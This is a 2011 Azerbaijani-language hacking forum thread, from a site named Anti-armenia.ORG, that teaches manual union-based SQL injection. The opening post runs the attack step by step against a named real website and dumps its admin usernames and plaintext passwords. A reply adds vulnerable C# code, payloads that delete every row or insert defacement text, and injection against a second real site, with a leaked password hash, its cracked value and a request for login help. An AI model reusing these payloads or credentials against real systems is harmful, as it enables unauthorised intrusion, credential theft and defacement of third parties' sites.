Anti-armenia.ORG - Forumlar - SQL Injection achigi (manual)



Istifadəçi
     2011-12-01 18:59 GMT                 

RAMSESS


VIP
Mesaj Sayı : 128
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   2  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş : 46
Mesaj :

Mövzunu Paylaş!


Sitat
Movzu PC-de shexsi arxivimden goturulub,muellif deqiq yadimda deyil.antivirus ve yaxudda Bot_25-e mexsus olmalidir.
Qiymetli derslik oldugu uchun,istedim yeni bashlayanlarla paylashim.Derslik uchun Muellife teshekkur.

Dedim qoy bu defe yazim sql injection haqqinda..Gorurem foruma qoyanda ele bilirler goyden dusme hardansa goturub qoyuruq//

Saytimiz: http://accuposturesystems.com/

Sql inj axtaririq ve inj olan linkimiz: http://accuposturesystems.com/subaccessories1.php?query=1&main_category_id=-1'a

Burda 1-in qarsisina - isaresi qoyuruq ki bezen olmadiqda sehv cixir..

Sirani tapaq.. ve bele cixdi linkimiz: http://accuposturesystems.com/subaccessories1.php?query=1&main_category_id=-1+union+select+1,2,3,4,5,6,7,8,9

2 3 cixdi siralar..versiyasina baxaq..

5.0.81-community-log cixdi..yaxsi demeli schema kececey//

table-lara baxaq..linkimiz: [url]http://accuposturesystems.com/subaccessories1.php?query=1&main_category_id=-1+union+select+1,group_concat(table_name),3,4,5,6,7,8,9+from+information_schema.tables[/url]

table-larimiz: CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,
SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,main_category,sub_category,sub_sub_category,
tblaccess_detail,tblaccessoriz,tbladmin,tblcontent,tblimage

bize lazim admin table : tbladmin

indi de tbladmin-deki column-lara baxaq..linkimiz: [url]http://accuposturesystems.com/subaccessories1.php?query=1&main_category_id=-1+union+select+1,group_concat(column_name),3,4,5,6,7,8,9+from+information_schema.columns+where+table_name=tbladmin[/url]

doList ErrorUnknown column 'tbladmin' in 'where clause' sehv cixdi..demeli admin table-i hexlemeliyik..

men bu saytda hexliyecem..text-e yazib asagida Pure Bytes ("A934") formati secib encode edirik ve hexlenmis hal 74626C61646D696E00 kimi aliriq..burda axirdaki 2 dene sifiri (hemise istenilen table hexledikde axirda 2 dene sifir olur ve hemise de linke qoyduqda silmeliyik) silirik ve qarsisina 0x yazib linke qoyuruq ve linkimiz:

[url]http://accuposturesystems.com/subaccessories1.php?query=1&main_category_id=-1+union+select+1,group_concat(column_name),3,4,5,6,7,8,9+from+information_schema.columns+where+table_name=0x74626C61646D696E[/url]

ve tbladmin table-indaki columnlar cixir..columnlar: rkey,name,username,password,lastlogin

lazim olanlar: username password

axira +from+tbladmin columnlari ise group_concat(username,0x3a,password) edib linkde yaziriq// linkimiz:

[url]http://accuposturesystems.com/subaccessories1.php?query=1&main_category_id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9+from+tbladmin[/url]

burda linkde yazdigim 0x3a 2 noqte) isaresi demekdi bunu yazdim ki login ve pass secmey olsun biri-birine qarismasin..tekce 0x3a yox 0x0b 0z2d ve s. bele isareler var ki her biri bildiyimiz bir isaredi..Burdan baxa bilersiniz..

bu da adminlerin login ve pass-lari..

stephen:mand01,ashton:createone,Paolo:isthebest

istesek char() funksiyasi ile alt-alta da duze bilerik..

neyse..hazirdi admin panel tapan vurar indexin vurar..

indi ise bezi meqamlari deyim..yuxarida versiyaya baxdiq bundan elave server melumatlarina baxa bilerik..

version() - versiyaya baxmaq
user() system_user() session_user() - user adina baxmaq ucundur her ucu..
database() - baza adina baxmaq ucun
@@version_compile_os - serverdeki OS-un adina ve versiyasina baxmaq ucun
now() curdate() - her ikisi servedeki vaxti ve tarixi gosterir

linkde yazdigim group_concat() -in yerine concat() concat_ws() de yaza bilerdim..ama group_concat() yazdim ki axtardgimizin hamisi cixsin sehifeye..

serverdeki bezi direktoriyalara da baxmaq olar..mes, men istifade etdiklerim..

@@basedir
@@datadir
@@tmpdir

Neyse bu qeder kim ne basa dusmese sorusa biler//

Anti-armenia.ORG
     
 

Istifadəçi
     2011-12-01 19:21 GMT                 

VusaL_R


Banned
Mesaj Sayı : 86
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş : 31
Mesaj :

Mövzunu Paylaş!


eziyyete qiymet.tesekkur

Anti-armenia.ORG
     
 

Istifadəçi
     2011-12-01 19:38 GMT                 

Rafaello


İstifadəçi
Mesaj Sayı : 3
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


tewekkurler...senin movzuna elave olaraq men de bunlar paylawmaq istedim.
SQL injection belkede yegane usuldu sayti hacklamaq ucun..yeni bu ne demekdir? Ramsessin gosterdiyi emeliyyatla saytin sql aciqindan saytin bazasina daxil olub,(html kod daxil etmekle) bazani deyiwe biler,ve bir sozle istediyinizi ede bilersiniz.Indi men size awaqida 2 primer gosterecem.SQL-le butun bazani deyiwib oz bazanizi nece qoya blersiniz.


1.SqlCommand command = new SqlCommand("DELETE from [Table] where id = "
2.+ Request.QueryString["id"], conn);
3. conn.Open();
4. command.ExecuteNonQuery();
5. conn.Close();


mesel1
35" target="_blank" onclick="if(confirm('Linkə keçid edək?')){return true;} else {return false;}">http://localhost:1475/injections/Default.aspx?id=>35 qoyursunuz(id-i tapdiqdan sonra)
id" target="_blank" onclick="if(confirm('Linkə keçid edək?')){return true;} else {return false;}">http://localhost:1475/injections/Default.aspx?id=>id yuxaridaki 35-in yerine id qoyursunuz,,bu veziyyetde her weyi silmiw olursunuz


mesel2
[url]http://localhost:1475/injections/Default.aspx?id=35;+INSERT+INTO+[Table]+([title],+[body])+VALUES+(bu[/url] sayt hack edildi BY_RAMSESS)






Ramsess bir cetinliyim var ...komek elesen de saqol elemesende




http://www.emultrix.com/modules.php?name=Mediacatalog&pa=Newsreliz&catnewid=3+union+select+1,2,admins_login,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41, 42,43,44,45,46,47,48,49+from+spnuke_admins/

bura kimi geldim bele sonuc aldim

# Admin
# Ferz
# ewgenij
# pitbul
# Duschmann
# Sako
# stasm
# roman
# ekctpa
# stinker
# -=TaNaToS=-
# avanes



ve bele md5 cavab Sako 91a7e942c18741ebb9458243a7bd028b


cevirib bu cavabi aldim Sako - 2099141


http://www.emultrix.com/admin.php
login - sako
password - 2099141 bu cur girirem eror verir neyi sehv etmiwem....?

Anti-armenia.ORG
     
 

Istifadəçi
     2011-12-02 12:29 GMT                 

MetaizM


Gold
Mesaj Sayı : 175
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   5  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


"SQL injection belkede yegane usuldu sayti hacklamaq ucun"
Bu Sozunle Razi Deilem Arasdirsan Gorersen nece metodlar Var Men Saysam Qutarmaz

Anti-armenia.ORG
     
 

Istifadəçi
     2011-12-02 13:33 GMT                 

Huseyn


İstifadəçi
Mesaj Sayı : 4
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Kim heqiqeten tap olaraq azeri chatlarda sql injektoru bacarirsa mene yazsin

Anti-armenia.ORG
     
 

Istifadəçi
     2011-12-03 13:45 GMT                 

TheScream


Banned
Mesaj Sayı : 122
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   1  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş : 25
Mesaj :

Mövzunu Paylaş!


Ela melumatdi tewekkurler!

Anti-armenia.ORG
     
 

Istifadəçi
     2011-12-03 13:55 GMT                 

Cek166


İstifadəçi
Mesaj Sayı : 10
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


http://www.emultrix.com/admin.php

Sitat
Not Found
The requested URL /admin.php was not found on this server.
www.emultrix.com

Anti-armenia.ORG
     
 

 
Site By: Ferid23 | Designed: MCH & FERID23  | Site: Anti-armenia.ORG